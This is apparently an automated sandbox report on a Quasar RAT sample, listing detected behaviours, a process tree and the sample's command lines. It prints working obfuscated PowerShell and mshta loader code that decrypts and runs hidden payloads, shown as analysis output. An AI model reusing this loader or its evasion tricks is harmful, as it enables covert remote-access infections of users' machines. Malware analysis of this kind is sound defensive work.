memory/2284-153-0x00007FF8A1910000-0x00007FF8A19BE000-memory.dmp
memory/2284-152-0x00007FF8A1F80000-0x00007FF8A215B000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-08-18 13:35
Reported
2024-08-18 13:37
Platform
win11-20240802-en
Max time kernel
60s
Max time network
55s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 5276 created 2804 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\System32\dllhost.exe |
| PID 1308 created 6060 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
Suspicious use of NtCreateUserProcessOtherParentProcess
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-mshta.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-cmd.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Indicator Removal: Clear Windows Event Logs
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
Hide Artifacts: Hidden Window
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Suspicious use of SetThreadContext
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File created | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File created | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File created | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\$sxr-mshta.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
"Handler.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AsZVG($IObBH){ $nGKhQ=[System.Security.Cryptography.Aes]::Create(); $nGKhQ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nGKhQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nGKhQ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk='); $nGKhQ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oe8taAs+mjon3dfZMtxPIg=='); $IIMfj=$nGKhQ.CreateDecryptor(); $return_var=$IIMfj.TransformFinalBlock($IObBH, 0, $IObBH.Length); $IIMfj.Dispose(); $nGKhQ.Dispose(); $return_var;}function nroxc($IObBH){ $lXPBt=New-Object System.IO.MemoryStream(,$IObBH); $jzRog=New-Object System.IO.MemoryStream; $raowK=New-Object System.IO.Compression.GZipStream($lXPBt, [IO.Compression.CompressionMode]::Decompress); $raowK.CopyTo($jzRog); $raowK.Dispose(); $lXPBt.Dispose(); $jzRog.Dispose(); $jzRog.ToArray();}function Dtllp($IObBH,$RqHgm){ $OepAU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$IObBH); $TRlDt=$OepAU.EntryPoint; $TRlDt.Invoke($null, $RqHgm);}$pyjrp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat').Split([Environment]::NewLine);foreach ($FdSgb in $pyjrp) { if ($FdSgb.StartsWith('SEROXEN')) { $AdNpy=$FdSgb.Substring(7); break; }}$tMmhK=[string[]]$AdNpy.Split('\');$vypGp=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[0])));$asijd=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[1])));Dtllp $asijd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Dtllp $vypGp (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{60413543-b28d-43e9-94ce-14cde01c7a56}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{12bfecfc-bdd5-4ae4-a983-2e067fa08bc0}
C:\Windows\$sxr-mshta.exe
C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
C:\Windows\$sxr-cmd.exe
"C:\Windows\$sxr-cmd.exe" /c %$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\$sxr-powershell.exe
C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 